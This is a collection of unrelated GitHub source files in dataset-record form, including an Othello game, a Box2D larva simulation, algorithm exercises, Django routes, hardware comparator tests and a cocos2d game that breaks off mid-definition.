WHITE_PLAYER\r\n player_turn = player\r\n running = True\r\n \r\n while running: #main game loop\r\n #GameOver(B, player_turn)\r\n SCREEN.fill(WHITE)\r\n B.Draw() #Drawing the board on a blank canvas at every iteration of the clock\r\n Stats(B.black_pieces, B.white_pieces)\r\n \r\n for event in pygame.event.get():\r\n\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n elif (player_turn == player) and (event.type == pygame.MOUSEBUTTONDOWN):\r\n pos = (PosX, PosY) = pygame.mouse.get_pos()\r\n if B.Update(pos, player_turn):\r\n player_turn = AI #i.e. if it was the black player, it's now the white player and vice versa\r\n\r\n if player_turn == AI: #the AI moves outside the event loop so it still acts when no input events arrive\r\n AIGuess(B, player_turn)\r\n player_turn = player\r\n \r\n pygame.display.update()\r\n FPS_CLOCK.tick(FPS)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"Doberman0/in2Science","sub_path":"FlippyOthello/Othello.py","file_name":"Othello.py","file_ext":"py","file_size_in_byte":10738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32083319270","text":"import os\nimport click\nfrom .utils import Utils\n\n\nclass Note:\n \"\"\"\n Note class. Responsible for handling note path\n validation and fetching filenames\n\n :param directory: directory of the mindspace\n :param name: name of the note\n \"\"\"\n\n def __init__(self, directory, name):\n self.directory = directory\n self.name = name\n self.filename = self.filename()\n self.path = self.path()\n\n def filename(self):\n \"\"\"\n Fetches the filename of the note based on its name.\n Prompts the user with options if there exist multiple\n notes with the same name.\n\n :return: note filename or error message\n \"\"\"\n notes = {}\n\n for file in os.listdir(self.directory):\n parts = file.split(\"-\")\n parts[len(parts) - 1] = parts[len(parts) - 1][:-3]\n notes[file] = \" \".join(parts[1:])\n\n if not self.duplicate_notes(notes):\n for id, name in notes.items():\n if name == self.name:\n return id\n else:\n click.secho(\n \"There exists more than one note with name: '{}'\".format(\n self.name),\n fg=\"yellow\",\n )\n for id, name in notes.items():\n if name == self.name:\n choice = input(\"Did you mean: {}? [y/n]: \".format(id))\n if choice == \"y\" or choice == \"Y\":\n return id\n\n Utils.display_error(\"Note not found.\", fg=\"red\")\n\n def duplicate_notes(self, notes):\n \"\"\"\n Checks if there exist duplicate notes in mindspace directory\n\n :param notes: notes dict\n :rtype: bool\n \"\"\"\n return list(notes.values()).count(self.name) > 1\n\n def path(self):\n \"\"\"\n Constructs the path based on the mindspace directory\n and filename\n\n :rtype: str or error\n \"\"\"\n path = os.path.join(self.directory, self.filename)\n\n if not os.path.exists(path):\n Utils.display_error(\"Note does not exist.\", \"red\")\n\n return os.path.join(self.directory, self.filename)\n","repo_name":"terror/mindspace","sub_path":"mindspace/note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"27304714504","text":"import Box2D\nimport numpy as np\nimport param\nfrom shapely import geometry\n\nfrom ... import aux, reg\nfrom . 
import LarvaSim\n\n__all__ = [\n 'BaseSegment',\n 'Box2DSegment',\n 'LarvaBox2D',\n]\n\n__displayname__ = 'Box2D larva'\n\n\nclass BaseSegment:\n \"\"\"\n Base segment of a larva.\n\n Args:\n pos (tuple): The position of the segment.\n orientation (float): The orientation of the segment.\n color (tuple): The color of the segment.\n base_seg_vertices (numpy.ndarray): The base segment vertices.\n base_seg_ratio (float): The base segment ratio.\n body_length (float): The length of the larva's body.\n\n \"\"\"\n\n __displayname__ = 'Body segment'\n\n def __init__(self, pos, orientation, color, base_seg_vertices, base_seg_ratio, body_length):\n self.color = color\n self.pos = pos\n self.orientation = orientation % (np.pi * 2)\n self.base_seg_vertices = base_seg_vertices\n self.base_local_rear_end = np.array([np.min(self.base_seg_vertices[:, 0]), 0])\n self.base_local_front_end = np.array([np.max(self.base_seg_vertices[:, 0]), 0])\n self.base_seg_ratio = base_seg_ratio\n self.body_length = body_length\n\n @property\n def seg_vertices(self):\n \"\"\"Get the vertices of the segment.\n\n Returns:\n numpy.ndarray:\n The vertices of the segment.\n \"\"\"\n return self.body_length * self.base_seg_vertices\n\n\nclass Box2DSegment(BaseSegment):\n \"\"\"\n Box2D-based segment of a larva.\n\n Args:\n space (Box2D.b2World): The Box2D world space.\n physics_pars (dict): Parameters related to the physics simulation.\n **kwargs (dict): Additional keyword arguments.\n\n\n Methods:\n vertices():\n Get the world coordinates of the segment's vertices.\n\n get_position():\n Get the world position of the segment.\n\n set_position(position):\n Set the world position of the segment.\n\n get_orientation():\n Get the orientation of the segment.\n\n set_orientation(orientation):\n Set the orientation of the segment.\n\n get_pose():\n Get the pose (position and orientation) of the segment.\n\n set_linearvelocity(lin_vel, local=False):\n Set the linear velocity of the segment.\n\n get_angularvelocity():\n Get the angular velocity of the segment.\n\n set_angularvelocity(ang_vel):\n Set the angular velocity of the segment.\n\n set_mass(mass):\n Set the mass of the segment.\n\n get_mass():\n Get the mass of the segment.\n\n get_world_point(point):\n Transform a local point to world coordinates.\n\n get_world_facing_axis():\n Get the world-facing axis of the segment.\n \"\"\"\n\n __displayname__ = 'Box2D body segment'\n\n def __init__(self, space, physics_pars, **kwargs):\n super().__init__(**kwargs)\n self._body: Box2D.b2Body = space.CreateDynamicBody(\n position=Box2D.b2Vec2(*self.pos),\n angle=self.orientation,\n linearVelocity=Box2D.b2Vec2(*[.0, .0]),\n angularVelocity=.0,\n bullet=True,\n linearDamping=physics_pars['lin_damping'],\n angularDamping=physics_pars['ang_damping'])\n\n for v in self.seg_vertices:\n self._body.CreatePolygonFixture(\n shape=Box2D.b2PolygonShape(vertices=v.tolist()),\n density=physics_pars['density'],\n friction=10,\n restitution=0,\n )\n\n self._fixtures = self._body.fixtures\n\n @property\n def vertices(self):\n \"\"\"\n Get the world coordinates of the segment's vertices.\n\n Returns\n -------\n numpy.ndarray\n The world coordinates of the segment's vertices.\n \"\"\"\n return np.array([[self.get_world_point(v) for v in vertices] for vertices in self.seg_vertices])\n\n def get_position(self):\n \"\"\"\n Get the world position of the segment.\n\n Returns\n -------\n numpy.ndarray\n The world position of the segment.\n \"\"\"\n pos = self._body.worldCenter\n return np.asarray(pos)\n\n def 
set_position(self, position):\n \"\"\"\n Set the world position of the segment.\n\n Parameters\n ----------\n position : tuple\n The new world position.\n \"\"\"\n self._body.position = position\n\n def get_orientation(self):\n \"\"\"\n Get the orientation of the segment.\n\n Returns\n -------\n float\n The orientation of the segment.\n \"\"\"\n return self._body.angle\n\n def set_orientation(self, orientation):\n \"\"\"\n Set the orientation of the segment.\n\n Parameters\n ----------\n orientation : float\n The new orientation of the segment.\n \"\"\"\n self._body.angle = orientation % (np.pi * 2)\n\n def get_pose(self):\n \"\"\"\n Get the pose (position and orientation) of the segment.\n\n Returns\n -------\n tuple\n The pose of the segment, including position and orientation.\n \"\"\"\n pos = np.asarray(self._body.position)\n return tuple((*pos, self._body.angle))\n\n def set_linearvelocity(self, lin_vel, local=False):\n \"\"\"\n Set the linear velocity of the segment.\n\n Parameters\n ----------\n lin_vel : tuple\n The new linear velocity.\n local : bool, optional\n Whether the linear velocity is in local coordinates. Defaults to False.\n \"\"\"\n if local:\n lin_vel = self._body.GetWorldVector(np.asarray(lin_vel))\n self._body.linearVelocity = Box2D.b2Vec2(lin_vel)\n\n def get_angularvelocity(self):\n \"\"\"\n Get the angular velocity of the segment.\n\n Returns\n -------\n float\n The angular velocity of the segment.\n \"\"\"\n return self._body.angularVelocity\n\n def set_angularvelocity(self, ang_vel):\n \"\"\"\n Set the angular velocity of the segment.\n\n Parameters\n ----------\n ang_vel : float\n The new angular velocity of the segment.\n \"\"\"\n self._body.angularVelocity = ang_vel\n\n def set_mass(self, mass):\n \"\"\"\n Set the mass of the segment.\n\n Parameters\n ----------\n mass : float\n The new mass of the segment.\n \"\"\"\n self._body.mass = mass\n\n def get_mass(self):\n \"\"\"\n Get the mass of the segment.\n\n Returns\n -------\n float\n The mass of the segment.\n \"\"\"\n return self._body.mass\n\n def get_world_point(self, point):\n \"\"\"\n Transform a local point to world coordinates.\n\n Parameters\n ----------\n point : tuple\n The local point coordinates.\n\n Returns\n -------\n numpy.ndarray\n The world coordinates of the point.\n \"\"\"\n return self._body.GetWorldPoint(np.asarray(point))\n\n def get_world_facing_axis(self):\n \"\"\"\n Get the world-facing axis of the segment.\n\n Returns\n -------\n numpy.ndarray\n The world-facing axis of the segment.\n \"\"\"\n return np.asarray(self._body.GetWorldVector(Box2D.b2Vec2(1.0, 0.0)))\n\n\nclass LarvaBox2D(LarvaSim):\n \"\"\"\n Box2D-based larva simulation.\n \"\"\"\n\n __displayname__ = 'Box2D larva'\n\n segs = param.List(item_type=Box2DSegment, doc='The body segments.')\n\n def __init__(self, Box2D, **kwargs):\n self.Box2D_params = Box2D\n super().__init__(**kwargs)\n\n def generate_segs(self):\n \"\"\"\n Generate the segments of the larva.\n \"\"\"\n kws = {\n 'physics_pars': {\n 'density': self.density,\n 'lin_damping': self.lin_damping,\n 'ang_damping': self.ang_damping,\n 'inertia': 0.0\n },\n 'space': self.model.space,\n }\n\n self.segs = aux.ItemList(objs=self.Nsegs, cls=self.param.segs.item_type, pos=self.seg_positions,\n orientation=self.orientation,\n base_vertices=self.base_seg_vertices,\n length=(self.length * self.segment_ratio).tolist(), **kws)\n\n if self.model.larva_collisions:\n for seg in self.segs:\n for fixture in seg._fixtures:\n fixture.filterData.groupIndex = -1\n\n self.joints = 
[]\n\n if self.Nsegs > 1:\n self.create_joints(self.Nsegs, self.segs, joint_types=self.Box2D_params['joint_types'])\n\n def prepare_motion(self, lin, ang):\n \"\"\"\n Prepare the larva for motion with given linear and angular velocities.\n\n Parameters\n ----------\n lin : float\n Linear velocity.\n ang : float\n Angular velocity.\n \"\"\"\n\n if self.ang_mode == 'velocity':\n ang_vel = ang * self.ang_vel_coef\n self.segs[0].set_angularvelocity(ang_vel)\n if self.Nsegs > 1:\n for i in np.arange(1, int(self.Nsegs / 2), 1):\n self.segs[i].set_angularvelocity(ang_vel / i)\n elif self.ang_mode == 'torque':\n self.segs[0]._body.ApplyTorque(ang * self.torque_coef, wake=True)\n\n # Linear component\n # Option : Apply to single body segment\n # We get the orientation of the front segment and compute the linear vector\n # target_segment = self.get_head()\n # lin_vec = self.compute_new_lin_vel_vector(target_segment)\n #\n # # From web : Impulse = Force x 1 Sec in Box2D\n # if self.mode == 'impulse':\n # imp = lin_vec / target_segment.get_Box2D_mass()\n # target_segment._body.ApplyLinearImpulse(imp, target_segment._body.worldCenter, wake=True)\n # elif self.mode == 'force':\n # target_segment._body.ApplyForceToCenter(lin_vec, wake=True)\n # elif self.mode == 'velocity':\n # # lin_vec = lin_vec * target_segment.get_Box2D_mass()\n # # Use this with gaussian crawler\n # # target_segment.set_lin_vel(lin_vec * self.lin_coef, local=False)\n # # Use this with square crawler\n # target_segment.set_lin_vel(lin_vec, local=False)\n # # pass\n\n # Option : Apply to all body segments. This allows to control velocity for any Npoints. But it has the same shitty visualization as all options\n # for seg in [self.segs[0]]:\n for seg in self.segs:\n l = lin * seg.get_world_facing_axis()\n if self.lin_mode == 'impulse':\n seg._body.ApplyLinearImpulse(l * self.lin_vel_coef / seg.get_mass(), seg._body.worldCenter, wake=True)\n elif self.lin_mode == 'force':\n seg._body.ApplyForceToCenter(l * self.lin_force_coef, wake=True)\n elif self.lin_mode == 'velocity':\n seg.set_linearvelocity(l * self.lin_vel_coef, local=False)\n\n def updated_by_Box2D(self):\n \"\"\"\n Update the larva simulation based on Box2D physics.\n \"\"\"\n\n self.set_position(tuple(self.global_midspine_of_body))\n self.trajectory.append(self.get_position())\n\n self.dst = geometry.Point(self.pos).distance(geometry.Point(self.trajectory[-1]))\n # self.dst = aux.eudis5(self.pos, self.trajectory[-1])\n self.cum_dst += self.dst\n self.compute_body_bend()\n\n # To make peristalsis visible we try to leave some space between the segments.\n # We define an interval proportional to the length : int*l.\n # We subtract it from the front end of all segments except the first and from the rear end of all segments except the last.\n # For Npoints=n, in total we subtract 2*(n-1)*int*l in length.\n # For width_to_length_ratio=w2l, the area of the body without intervals is A=w2l*l*l\n # Subtracting the intervals, this translates to A'= (l-2*(n-1)*int*l) * w2l*l = (1-2*(n-1)*int)*A\n # To get the same mass, we will raise the density=d to d' accordingly : mass=d*A = d'*A' ==> d'=d/(1-2*(n-1)*int)\n # def add_interval_between_segments(self, Nsegs, density, interval, seg_starts, seg_stops):\n # for i in range(1, len(seg_starts)):\n # seg_starts[i] -= interval\n # for i in range(len(seg_stops) - 1):\n # seg_stops[i] += interval\n #\n # self.density = density / (1 - 2 * (Nsegs - 1) * interval)\n #\n # return seg_starts, seg_stops\n\n def create_joints(self, Nsegs, segs, 
joint_types=None):\n \"\"\"\n Create joints to connect the segments of the larva.\n\n Parameters\n ----------\n Nsegs : int\n The number of segments in the larva.\n segs : list of Box2DSegment\n The list of Box2DSegment objects representing the larva segments.\n joint_types : dict, optional\n A dictionary specifying the types of joints to create. The dictionary should contain keys for different\n joint types ('distance', 'revolute', 'friction') and values specifying the number of joints of each type\n to create ('N') and the joint parameters ('args') for each type.\n\n Notes\n -----\n The `joint_types` parameter is optional and, if not provided, it will use the joint types and parameters\n defined in the `Box2D` attribute of the larva simulation.\n\n This method creates various types of joints (distance, revolute, and friction) to connect the segments of the\n larva together in a physically realistic way.\n\n \"\"\"\n\n if joint_types is None:\n joint_types = aux.AttrDict({'friction': {'N': 0,\n 'args': {'maxForce': {'v': 1, 'lim': (0.0, 100000)},\n 'maxTorque': {'v': 1, 'lim': (0.0, 100000)}}},\n 'revolute': {'N': 0,\n 'args': {'enableMotor': True,\n 'maxMotorTorque': {'v': 0.0, 'lim': (0.0, 100000)},\n 'motorSpeed': {'v': 0.0, 'lim': (0.0, 100000)}}},\n 'distance': {'N': 0,\n 'args': {'frequencyHz': {'v': 5.0, 'lim': (0.0, 100000)},\n 'dampingRatio': {'v': 1.0, 'lim': (0.0, 100000)}}}})\n space = self.model.space\n l0 = self.sim_length / self.Nsegs\n\n # TODO Find compatible parameters.\n # Until now for the 12-seg body : density 30000 and maxForce 100000000 and torque_coef 3.5 seem to work for natural bend\n # Trying to implement friction joint\n # if joint_types is None :\n # joint_types = {'distance': 0, 'revolute': 0, 'friction' : 0}\n for i in range(Nsegs):\n if i == 0:\n continue\n # if joint_types['friction']\n # friction_pars = {'maxForce': 10 ** 0, 'maxTorque': 10 ** 1}\n if joint_types['friction']['N'] == 2:\n xAs = [-0.5, 0.5]\n elif joint_types['friction']['N'] == 1:\n xAs = [0]\n else:\n xAs = []\n for xA in xAs:\n friction_joint = space.CreateFrictionJoint(**joint_types['friction']['args'],\n bodyA=segs[i]._body,\n bodyB=self.model.friction_body,\n localAnchorA=(xA, 0),\n localAnchorB=(0, 0))\n\n self.joints.append(friction_joint)\n\n # For many segments, the front one(sigma) will be joint by points outside the body.\n # So we adopt a more conservative solution, bringing the attachment point more medially : No visible difference\n # lateral_attachment_dist = self.width_to_length_ratio * self.Npoints / 4\n\n dist_joint_def = {'collideConnected': False,\n # 'frequencyHz': 5,\n # 'dampingRatio': 1,\n 'length': l0 * 0.01}\n joint_types['distance']['args'].update(dist_joint_def)\n w = self.width_to_length_ratio * Nsegs / 2\n\n for i in range(Nsegs - 1):\n weld_def = {\n 'dampingRatio': 0.1,\n 'referenceAngle': 0,\n 'frequencyHz': 2000\n }\n A, B = segs[i]._body, segs[i + 1]._body\n # if joint_types['distance']['N'] == 2:\n\n space.CreateWeldJoint(**weld_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, w)),\n localAnchorB=tuple(l0 * x for x in (0.5, w))\n\n )\n # space.CreateWeldJoint(**weld_def,\n # bodyA=A, bodyB=B,\n # localAnchorA=tuple(l0 * x for x in (-0.5, -w)),\n # localAnchorB=tuple(l0 * x for x in (0.5, -w)))\n\n for i in range(Nsegs - 1):\n A, B = segs[i]._body, segs[i + 1]._body\n if joint_types['distance']['N'] == 2:\n j_l = space.CreateDistanceJoint(**joint_types['distance']['args'],\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in 
(-0.5, w)),\n localAnchorB=tuple(l0 * x for x in (0.5, w)))\n j_r = space.CreateDistanceJoint(**dist_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, -w)),\n localAnchorB=tuple(l0 * x for x in (0.5, -w)))\n self.joints.append([j_l, j_r])\n elif joint_types['distance']['N'] == 1:\n j = space.CreateDistanceJoint(**dist_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, 0)),\n localAnchorB=tuple(l0 * x for x in (0.5, 0)))\n self.joints.append(j)\n\n if joint_types['revolute']:\n\n rev_joint_def = {'collideConnected': False,\n 'referenceAngle': 0,\n 'enableLimit': True,\n 'lowerAngle': -0.9 * (np.pi * 2) / (Nsegs - 1),\n 'upperAngle': 0.9 * (np.pi * 2) / (Nsegs - 1),\n # 'enableMotor': True, # )\n # 'maxMotorTorque': 1.0,\n # 'motorSpeed': 1\n }\n joint_types['revolute']['args'].update(rev_joint_def)\n for i in range(Nsegs - 1):\n A, B = segs[i]._body, segs[i + 1]._body\n if joint_types['revolute']['N'] == 2:\n j_l = space.CreateRevoluteJoint(**joint_types['revolute']['args'],\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, w)),\n localAnchorB=tuple(l0 * x for x in (0.5, w)))\n j_r = space.CreateRevoluteJoint(**rev_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, -w)),\n localAnchorB=tuple(l0 * x for x in (0.5, -w)))\n self.joints.append([j_l, j_r])\n elif joint_types['revolute']['N'] == 1:\n j = space.CreateRevoluteJoint(**rev_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, 0)),\n localAnchorB=tuple(l0 * x for x in (0.5, 0)))\n self.joints.append(j)\n","repo_name":"bagjohn/larvaworld_autoversioning","sub_path":"src/larvaworld/lib/model/agents/_larva_box2d.py","file_name":"_larva_box2d.py","file_ext":"py","file_size_in_byte":21003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43546617037","text":"from Mahasiswa import Mahasiswa\n\ndata = Mahasiswa()\n\nprint(\"Input\")\nnama = str(input(\"Nama : \"))\nnim = str(input(\"NIM : \"))\nprodi = str(input(\"Program Studi : \"))\nfakultas = str(input(\"Fakultas: \"))\n\nprint(\"\\nData\")\ndata.setNama(nama)\ndata.setNim(nim)\ndata.setProdi(prodi)\ndata.setFakultas(fakultas)\ndata.printHasil()","repo_name":"MuhammadFahru/LATIHAN1DPBO2023","sub_path":"Python/Program/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74779235071","text":"a = input().lower().split()\nqwe = []\nfor item in a:\n last = \";\"\n for i in item:\n if last.isalpha() and i.isalpha() and (last + i) not in qwe:\n qwe.append(last + i)\n last = i\nprint(len(qwe))\n\n","repo_name":"Disfavour/pythonprac","sub_path":"20201015_1/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41301094084","text":"\"\"\"\n Winter is coming: design a heater with a fixed heating radius that warms all the houses.\n Every house within a heater's heating radius receives heat.\n Given the positions of the houses and the heaters on a horizontal line, find and return the minimum heating radius that covers every house.\n example 1:\n input: houses = [1,2,3], heaters = [2]\n output: 1\n example 2:\n input: houses = [1,2,3,4], heaters = [1,4]\n output: 1\n example 3:\n input: houses = [1,5], heaters = [2]\n output: 3\n\"\"\"\nfrom typing import List\n\n\n# For each house, find the nearest heater before it and the nearest heater after it, and keep the smaller of the two distances\n# Two pointers, pointer_previous and pointer_next, track the heater before and the heater after the current house\n# The target radius is then the maximum of these per-house distances\n# When there is only a single heater, compute each distance directly and return\ndef heaters(houses: List[int], heaters: List[int]) -> int:\n
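 # Worked example (example 3 above): for houses=[1,5], heaters=[2] the distances are |1-2|=1 and |5-2|=3, so the radius is max(1,3)=3\n result 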
= []\n if len(heaters) == 1:\n for item in houses:\n result.append(abs(item - heaters[0]))\n return max(result)\n houses.sort()\n heaters.sort()\n pointer_previous, pointer_next = 0, 1\n for house in houses:\n while pointer_next < len(heaters) - 1 and heaters[pointer_next] < house:\n pointer_next += 1\n pointer_previous += 1\n result.append(min(abs(house - heaters[pointer_previous]), abs(heaters[pointer_next] - house)))\n return max(result)\n\n\nif __name__ == '__main__':\n print(heaters(houses=[1, 2, 3], heaters=[2]))\n print(heaters(houses=[1, 2, 3, 4], heaters=[1, 4]))\n print(heaters(houses=[1, 5], heaters=[2]))\n","repo_name":"zexiangzhang/algorithmAndDataStructure","sub_path":"algorithm/double_pointer/segmented_double_pointer/heaters.py","file_name":"heaters.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"14277596119","text":"from pathlib import Path\n\nfrom src.event.base import Base\n\n\nclass File(Base):\n def __init__(self, modified_time, file_event_type: str, file_name: Path, diff: list):\n super().__init__(modified_time)\n self.file_event_type = file_event_type\n self.file_name = file_name\n self.diff = diff\n\n def __str__(self):\n representation = super().__str__() + '\\n'\n representation += 'file_event_type: ' + self.file_event_type + '\\n'\n representation += 'file_name: ' + str(self.file_name) + '\\n'\n representation += 'diff: ' + str(self.diff) + '\\n'\n return representation\n","repo_name":"KaimaneKaimane/eventbroker","sub_path":"src/event/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17533948714","text":"from django.conf.urls import url\nfrom . 
import views \napp_name = 'game' \n\nurlpatterns = [\n url(r'^computer/(?P\\d+)$', views.index, name='index'), \n url(r'^/reloadDiv$', views.reload, name='reloadDiv'), \n url(r'^/incermentTurn$', views.incermentTurn, name='incermentTurn'), \n url(r'^player1/(?P\\d+)$', views.multiplayer, name='multiplayer'),\n url(r'^player2/(?P\\d+)$', views.player2, name='player2'),\n url(r'^update$', views.update, name='update'),\n url(r'^update1$', views.update1, name='update1')\n]","repo_name":"Shawnpcw/Math-Tic-Tac-Toe","sub_path":"apps/game/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33599056422","text":"import pytest\nimport magma\nfrom magma import compile\nfrom magma.testing import check_files_equal\nfrom mantle.lattice.mantle40.compare import \\\n DefineEQ, DefineNE, \\\n DefineUGE, DefineULE, DefineUGT, DefineULT, \\\n DefineSGE, DefineSLE, DefineSGT, DefineSLT\nfrom fault.test_vectors import generate_function_test_vectors, \\\n generate_simulator_test_vectors\n\nwidth = 2\nmask = 2**width-1\n\ndef sim(Test, TestFun):\n tvsim = generate_simulator_test_vectors(Test)\n tvfun = generate_function_test_vectors(Test, TestFun)\n assert tvsim == tvfun\n\ndef com(Test, name):\n name = 'test_{}'.format(name)\n build = 'build/' + name\n gold = 'gold/' + name\n compile(build, Test)\n assert check_files_equal(__file__, build+'.v', gold+'.v')\n\n\ndef test_eq():\n Test = DefineEQ(width)\n sim( Test, lambda x, y: int(x == y) )\n com( Test, 'eq{}'.format(width) )\n\ndef test_ne():\n Test = DefineNE(width)\n sim( Test, lambda x, y: int(x != y) )\n com( Test, 'ne{}'.format(width) )\n\n\ndef test_uge():\n Test = DefineUGE(width)\n sim( Test, lambda x, y: int(x >= y) )\n com( Test, 'uge{}'.format(width) )\n\ndef test_ule():\n Test = DefineULE(width)\n sim( Test, lambda x, y: int(x <= y) )\n com( Test, 'ule{}'.format(width) )\n\ndef test_ugt():\n Test = DefineUGT(width)\n sim( Test, lambda x, y: int(x > y) )\n com( Test, 'ugt{}'.format(width) )\n\ndef test_ult():\n Test = DefineULT(width)\n sim( Test, lambda x, y: int(x < y) )\n com( Test, 'ult{}'.format(width) )\n\n\ndef test_sge():\n Test = DefineSGE(width)\n print(Test.interface)\n sim( Test, lambda x, y: int(x >= y) )\n com( Test, 'sge{}'.format(width) )\n\ndef test_sle():\n Test = DefineSLE(width)\n sim( Test, lambda x, y: int(x <= y) )\n com( Test, 'sle{}'.format(width) )\n\ndef test_sgt():\n Test = DefineSGT(width)\n sim( Test, lambda x, y: int(x > y) )\n com( Test, 'sgt{}'.format(width) )\n\ndef test_slt():\n Test = DefineSLT(width)\n sim( Test, lambda x, y: int(x < y) )\n com( Test, 'slt{}'.format(width) )\n\n","repo_name":"akeley98/mantle","sub_path":"tests/test_mantle40/test_compare.py","file_name":"test_compare.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"30798938744","text":"#This file is part of linkrease.\n\n#linkrease is free software: you can redistribute it and/or modify\n#it under the terms of the GNU General Public License as published by\n#the Free Software Foundation, either version 3 of the License, or\n#(at your option) any later version.\n\n#linkrease is distributed in the hope that it will be useful,\n#but WITHOUT ANY WARRANTY; without even the implied warranty of\n#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n#GNU General Public License for more details.\n\n#You should have received a copy of the GNU General Public License\n#along with linkrease. If not, see .\n\nimport pyglet\n\nimport cocos\nfrom cocos.actions import *\nfrom cocos.scenes import *\nfrom cocos.director import director\n\nimport settings\nimport levels\nimport layers\n\nfrom multiplayer import current_player\n\n\nclass IntroScene(cocos.scene.Scene):\n def __init__(self):\n super(IntroScene, self).__init__()\n\n # create layers\n colour_data = settings.COLOUR_DATA['intro']\n bg_layer = cocos.layer.ColorLayer(*colour_data['background'])\n text_layer = cocos.layer.Layer()\n\n # create label\n name_label = cocos.text.Label(\n \"Presenting CWD's\",\n font_name='Courier New',\n font_size=40,\n anchor_x='center',\n anchor_y='center',\n color=colour_data['text'],\n position=(settings.SCR_MID_X, settings.SCR_MID_Y),\n )\n name_label.opacity = 0\n\n #add label to layer\n text_layer.add(name_label)\n\n #add layers to scene\n self.add(bg_layer)\n self.add(text_layer)\n\n #text layer actions\n name_label.do(\n Accelerate(FadeIn(4), rate=2) +\n Delay(1) +\n FadeOut(2) +\n CallFunc(self.on_end_intro) # called when animations are finished\n )\n\n def on_end_intro(self):\n director.replace(FadeTransition(MenuScene(), duration=1))\n\n\nclass MenuScene(cocos.scene.Scene):\n def __init__(self):\n super(MenuScene, self).__init__()\n colour_data = settings.COLOUR_DATA['menu']\n self.bg_layer = cocos.layer.ColorLayer(*colour_data['background'])\n self.add(self.bg_layer)\n self.add(MainMenu())\n\n\nclass MainMenu(cocos.menu.Menu):\n def __init__(self, title='LINKREASE'):\n super(MainMenu, self).__init__(title=title)\n self.font_title['font_name'] = 'Courier New'\n self.font_title['font_size'] = 60\n self.font_item['font_name'] = 'Courier New'\n self.font_item['font_size'] = 30\n self.font_item_selected['font_name'] = 'Courier New'\n self.font_item_selected['font_size'] = 30\n\n items = [\n cocos.menu.MenuItem('New Game', self.on_new_game),\n cocos.menu.MenuItem('Options', self.on_options),\n cocos.menu.MenuItem('Quit', pyglet.app.exit),\n ]\n\n self.create_menu(items, cocos.menu.zoom_in(), cocos.menu.zoom_out())\n\n def on_new_game(self):\n director.replace(FadeTransition(GameScene(), duration=1))\n\n def on_options(self):\n pass\n\n def on_quit(self):\n pass\n\n\nclass GameLayerController(cocos.layer.scrolling.ScrollingManager):\n is_event_handler = True\n\n def __init__(self, map):\n super(GameLayerController, self).__init__()\n self.scale = settings.ZOOM_MIN\n\n #store model\n self.map = map\n\n #create view\n self.map_view = layers.MapView(map)\n self.add(self.map_view)\n\n #add callback to model\n self.map.add_listener(self.on_model_change)\n self.map.add_fleet_listener(self.on_fleet_launched)\n\n def on_mouse_press(self, x, y, buttons, modifiers):\n px, py = self.map_view.map_from_pixel(*self.pixel_from_screen(x, y))\n n = self.map.closest_node_to(px, py)\n player = current_player()\n if self.map.get_owner(n) is player:\n self.map.select_node(player, n)\n\n def on_mouse_release(self, x, y, buttons, modifiers):\n player = current_player()\n source = self.map.selected_node(player)\n target = self.map.targeted_node(player)\n if source is not None and source is not target:\n player = current_player()\n self.map.move_units_to_target(player)\n self.map.select_node(player, None)\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n player = current_player()\n if self.map.selected_node(player) is not None:\n px, py = 
self.map_view.map_from_pixel(*self.pixel_from_screen(x, y))\n n = self.map.closest_node_to(px, py)\n self.map.target_node(player, n)\n\n def on_mouse_scroll(self, x, y, dx, dy):\n \"\"\"\n Zoom on mouse scroll.\n\n x, y: position of mouse on screen\n dx: horizontal scroll value\n dy: vertical scroll value\n \"\"\"\n #calculate next scale value\n scale = self.scale + (settings.ZOOM_STEP * dy)\n\n #restrict to bounds\n if scale < settings.ZOOM_MIN:\n scale = settings.ZOOM_MIN\n elif scale > settings.ZOOM_MAX:\n scale = settings.ZOOM_MAX\n\n if scale != self.scale:\n #set scale\n self.scale = scale\n px, py = self.pixel_from_screen(x, y)\n #set centre point\n self.set_focus(px, py)\n\n def on_model_change(self):\n self.map_view.on_model_change()\n\n def on_fleet_launched(self, fleet):\n fleet.add_arrival_listener(self.on_fleet_arrived)\n self.schedule(fleet.step_time)\n\n def on_fleet_arrived(self, fleet):\n self.map.deploy(fleet.get_target(), fleet.get_num_units(), fleet.get_owner())\n self.unschedule(fleet.step_time)\n\n\nclass GameScene(cocos.scene.Scene):\n def __init__(self, 